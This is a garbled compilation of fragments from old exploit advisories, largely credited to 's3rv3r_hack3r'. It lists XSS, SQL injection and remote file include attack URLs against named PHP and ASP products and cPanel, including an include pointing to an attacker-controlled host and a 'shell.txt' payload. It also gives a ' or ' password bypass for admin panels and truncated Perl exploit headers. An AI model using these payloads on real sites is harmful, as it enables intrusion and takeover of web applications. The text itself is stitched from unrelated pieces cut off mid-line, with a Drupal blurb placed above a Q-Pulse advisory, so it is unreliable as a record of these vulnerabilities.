---
about the vendor:
Drupal is an open source content management platform powering millions of
websites and applications. It's built, used, and supported by an active and
diverse community of people around the world.
Advisory Details:
During a Pentest Help AG auditors(Ali & Khal
Cross-Site Scripting (XSS) in Q-Pulse application
Advisory ID: hag201475
Product: q-pulse risk management software
Vendor: q-pulse
Vulnerable Version(s): 0.6 and probably prior
Tested Version: 0.6
Advisory Publication: January 14, 2013
Vendor Notification: July 31, 2013
Public Disclosure: Decem
# Exploit Title: Multiple SQL injections in rivettracker <=1.03
# Date: 2/3/2012
# Author: Ali Raheem
# Software Link: http://www.rivetcode.com/software/rivettracker/
# Version: <=1.03
# Tested on: Linux guruplug-debian 3.1.7 #2 PREEMPT Tue Jan 3 20:19:54
MST 2012 armv5tel GNU/Linux
#
vendor : cpanel
version : all...
by : s3rv3r_hack3r
my-web-sitez : www.hackerz.ir - ali.hackerz.ir
exploit:
http://dpmaon.com:2086/scripts/passwdmysql?password=[xss]&user=root&submit=Change+Password
name : web host manager
vendor : cpanel.net
by : s3rv3r_hack3r (ali [at] hackerz [dot] ir)
web-site : www.hackerz.ir - ali.hackerz.ir
exploit:
http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?
###
@cid stats v2.3 File Include
###
Source Code:
http://www.comscripts.com/jump.php?action=script&id=1115
###
Vulnerable Code:_
install.php3
#
###
phpLedAds 2.0(dir) File Include
###
Source Code:
ftp://ftp1.comscripts.com/PHP/175_phpledad-20.zip
###
Vulnerable Code:_
click.php & ledad.php & le
###
PLS-Bannieres 1.21 (bannieres.php) File Include
###
Source Code:
ftp://ftp1.comscripts.com/PHP/1959_ban01-01.zip
###
Vulnerable Code:_
modules/bann
###
Ban v0.1 (bannieres.php) File Include
###
Source Code:
ftp://ftp1.comscripts.com/PHP/1959_ban01-01.zip
###
Vulnerable Code:_
modules/bannieres/bann
###
PHP Poll Creator 1.04 (poll_vote.php) File Include
###
Source Code:
http://www.phppc.de/download/phppc_104.zip
###
Vulnerable Code:_
include $relat
###
DigitalHive 2.0 RC2 (base_include.php) File Include
###
Source Code:
http://www.comscripts.com/jump.php?action=script&id=1502
###
Vulnerable Code:_
include ($_GET["page"]);
###
PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability
###
Source Code:
http://www.comscripts.com/jump.php?action=script&id=666
###
Vulnerable Code:_
include($phpbb_
###
CS-Forum 0.82 (ajouter.php) Remote File Include Vulnerability
###
Source Code:
http://www.comscripts.com/jump.php?action=script&id=643
###
Vulnerable Code:_
include("$inclu
PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
Source Code:
http://www.comscripts.com/jump.php?action=script&id=697
Vulnerable Code:_
require($cfg_racine."inc/vars.php");
require($cfg_racine."inc/config.php");
require($cfg_racine."inc/fonctions.php");
re
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
EXlor 1.0 (/fonctions/template.php) Remote File Include Vulnerability
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
Source Code:
http://www.comscripts.com/jump.php?action=script&id=1904
-=-=--
NixieAffiliate all version
vendor : idevspot.com
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
Bypass for delete any aff ID :>>
www.domain.com/NixieAffiliate/delete.php?id=1
Xss :>>
www.domain.com/NixieAffiliate/forms/lostpassword.php?error=[xss]
BizDirectory All version == RFI
vendor : idevspot.com
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
www.domain.com/BizDirectory/Feed.php?stylesheet=[xss]
www.domain.com/BizDirectory/status.php?message=[xss]
vendor : easypage.org
BY : s3rv3r_hack3r
www : hackerz.ir & h4ckerz.com
bug : >
default.aspx?page=Search&app=Search&srch=[sql]
and more ...
vendor :www.idevspot.com
Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange
By : s3rv3r_hack3r
www: hackerz.ir & h4ckerz.com
remote file include :
http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]
xss:
http://www.domain.com/PhpLinkExchange/user_add.php?
vendor : www.idevspot.com
version : all version
By : s3rv3r_hack3r
www : hackerz.ir & h4ckerz.com
http://localhost/textads/clients/delete.php?id=[xss]
http://victim/textads/clients/error.php?error[xss]
and more...
script name : php download
vendor : www.threesquared.net
By : s3rv3r_hack3r
u can include local file
>>
www.victim.com/download/index.php?file=[file path]
+
JS ASP Faq Manager v1.10
vendor : http://jetstat.com/
Demo : http://jetstat.com/demo/jsfaq/admin/
By : s3rv3r_hack3r
Site : www.hackerz.ir & www.h4kerz.com
U can login to administrator control panel with >>
user : admin
pass : ' or '
u can login to your account without username !
example :
your user name : hackerz
your password : 123456
u can login with only - pass : 123456
++
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx ,sattar.li , stanic, mfox,blood moon and..
##
# ___ _____ #
# / | \_ | | __ ___ #
#/~\__ \ _/
Vendor : SiteMan
Target Page : admin_login.asp
Bug Finder : S3rv3r_hack3r
administrator panel (demo): http://www.ispdemos.com/Demo/SiteMan/admin_login.asp
WWW : http://www.ispofegypt.com/
you can login to admin_login.asp with >>
user : admin
pass : ' or '
Vendor : linksubmit
Version : All Version
www : http://www.phpselect.com
AUTHOR : s3rv3r_hack3r
you can submit html tag's in $description (linksubmit.php)
Exploit :
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and..
###
26 matches